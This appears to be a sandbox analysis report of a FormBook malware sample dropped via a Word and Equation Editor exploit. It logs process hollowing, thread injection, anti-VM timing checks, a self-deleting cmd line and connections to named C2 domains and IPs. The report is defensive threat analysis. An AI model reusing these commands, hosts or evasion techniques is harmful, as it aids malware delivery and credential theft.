          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00A24403 push esi; ret 6_2_00A24432
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003290F2 pushfd ; ret 6_2_00329171
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003290DA push esp; ret 6_2_003290F1
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00328F38 push eax; retn 002Dh6_2_00328F39
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003606AF push 036C4A39h; ret 6_2_003606B9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004AA4B6 push esi; iretd 6_2_004AA4B7
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004AA8B5 push edi; retf 6_2_004AA8B6
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D7CC7 push ecx; ret 6_2_004D7CCC
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D7112 push es; iretd 6_2_004D7117
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00873EBF push ebx; retf 6_2_00873EC0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00873ABB push edi; iretd 6_2_00873ABC
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_008746BB push edx; ret 6_2_008746C1
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087051F push es; iretd 6_2_00870533
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02407248 push 00000003h; ret 6_2_0240725D
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02401E4D push 00000003h; ret 6_2_02401E57
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02404E5A push 00000003h; ret 6_2_02404E71
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403E63 push 00000003h; ret 6_2_02403E79
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02402671 push 00000003h; ret 6_2_0240267B
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02402E71 push 00000003h; ret 6_2_02402E74
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406671 push 00000003h; ret 6_2_0240668E
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02404672 push 00000003h; ret 6_2_0240467C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0240261D push 00000003h; ret 6_2_02402627
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406220 push 00000003h; ret 6_2_0240623C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02400A22 push 00000003h; ret 6_2_02400A25
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403E22 push 00000003h; ret 6_2_02403E25
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02406A32 push 00000003h; ret 6_2_02406A36
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02403633 push 00000003h; ret 6_2_02403636
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02405E3B push 00000003h; ret 6_2_02405E3E
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_024032E4 push 00000003h; ret 6_2_024032E7
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02405AEF push 00000003h; ret 6_2_02405B20
          Source: Client.exe.0.drStatic PE information: section name: 5++.8$
          Source: Client.exe.0.drStatic PE information: section name:
          Source: initial sampleStatic PE information: section name: 5++.8$ entropy: 7.999437666681734

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\notepad.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\notepad.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00AB26F8 mov eax, dword ptr fs:[00000030h]9_2_00AB26F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409AB0 rdtsc 9_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004D33F8 LdrLoadDll,6_2_004D33F8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.best-boy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 104.167.67.175 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.170 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thegoldencamel.online
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5AJump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000Jump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 80000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975DJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1860Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"Jump to behavior
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
